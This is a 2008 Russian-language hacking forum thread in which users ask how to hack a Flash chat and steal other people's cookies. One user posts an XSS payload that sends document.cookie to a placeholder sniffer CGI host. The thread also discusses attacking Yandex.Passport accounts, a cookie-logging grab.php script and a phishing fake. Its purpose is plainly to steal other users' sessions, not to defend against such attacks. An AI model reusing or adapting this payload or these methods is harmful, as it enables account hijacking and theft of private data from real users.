Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы.
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-02 17:51:10.723333
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
Flash! атака
какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы или загружать её на сервер и как примерно
делается getURL В качестве входного параметра обычно используется в URL
и в результате которой могут похищены cookies
и какие опасные параметры в getURL(). Это касается случая, когда web-приложения позволяют закачивать SWF файлы на сервер.
вообщем к делу; как взломать flash чат есть какие способы спереть кукие ,подскажите…
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-02 18:07:46.606666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Сумбурно как всё….
по сабжу - внедри ява-скрипт в флешку, и если не ТАМ нет проверки на содержимое - куки твои
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-02 19:03:44.453333
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
если можешь скинь какой-нить пример для просмотра….
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-02 19:10:31.440000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Куда скинь? На сайт, где есть xss в флешках? Ха
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-02 21:27:25.376666
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
да не на сайт не надо скидывать, примерный како-нить скрипт которым можно кукие стырить ,не ужели не понятно?
я один тебе покажу с античата вырыл ,
<div class='postcolor'> <еmbеd width="400" height="300" src=http://1.ru e=` type="application/x-shockwave-video">` style=display:none;background:url(javasсriрt:document.images[12].src="http://адрес_сниффера.cgi?="+document.cookie) <i>L</i>ol </div>
но как его примерно в Flash чате заюзать ,а
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-02 21:35:52.740000
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
вообщем спасибки сам разобрался ,если будут вопросы подайду…
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-02 22:31:57.573333
|
|
|
Viper[o_O]k
Сообщений: 163
Оценки: 0
Присоединился: 2008-08-16 09:31:45.666666
|
quote:
ORIGINAL: bobik23
вообщем спасибки сам разобрался ,если будут вопросы подайду…
тут фото http://i059.radikal.ru/0807/e7/50bc174a9d63.jpg
ВКонтакте щас сверху пишется, что ни одно приложение не требует ввода мыла и пароля..
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-03 01:54:16.086666
|
|
|
OO7SOM
Сообщений: 165
Оценки: 0
Присоединился: 2007-07-19 14:42:15.950000
|
кстати один из самых грамотных разводов, что я виде
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-04 23:20:24.693333
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
как флэшка сохранится в кэше браузера и как она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится.плз
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-04 23:51:12.470000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
по сабжу:
создаёшь flash и вставляешь туда на какой нибудь кадр action script, сам я такого давно не делал, но вроде там всё просто
п.с. >> тут фото http://i059.radikal.ru/0807/e7/50bc174a9d63.jpg
а при чём здесь фейк?
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-22 02:26:17.906666
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
Атака на аккаунт Яндекс.Паспорт
прежде чем начать эту тему,пажалуйста нажмите сюда http://www.marketer.ru/node/800
если вы внимательно прочитали ,то тогда можно задавать вопросы.
1) в этой статье, мне было только одно не ясно ,файл grab.php? который должен был загрузится на сервер и записавать стыреные куки в лог.тхт ,,,при загруски выдыло на серверe такую ошибку Parse error: syntax error, unexpected T_VARIABLE in /home/a9973702/public_html/grab/grab.php on line 4.
дайте плз сoвет что может быть тут..
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-22 03:53:08.353333
|
|
|
RanDoMix
Сообщений: 1568
Оценки: 0
Присоединился: 2007-10-20 20:09:28.990000
|
quote:
дайте плз сaвет что может быть тут..
Тут может быть знак вопроса…или должен ?
Кстати, синтаксическая ошибка у тебя в четвёртой строке.
|
|
|
|
|
RE: Flash! атака какие Атаки позволяют вставлять пользователям Flash анимацию в HTML-код страницы. - 2008-11-22 15:42:25.693333
|
|
|
bobik23
Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
|
спасибо!
нажмите на кнопачку
так можно угнать куки…
|
|
|
|
|
|
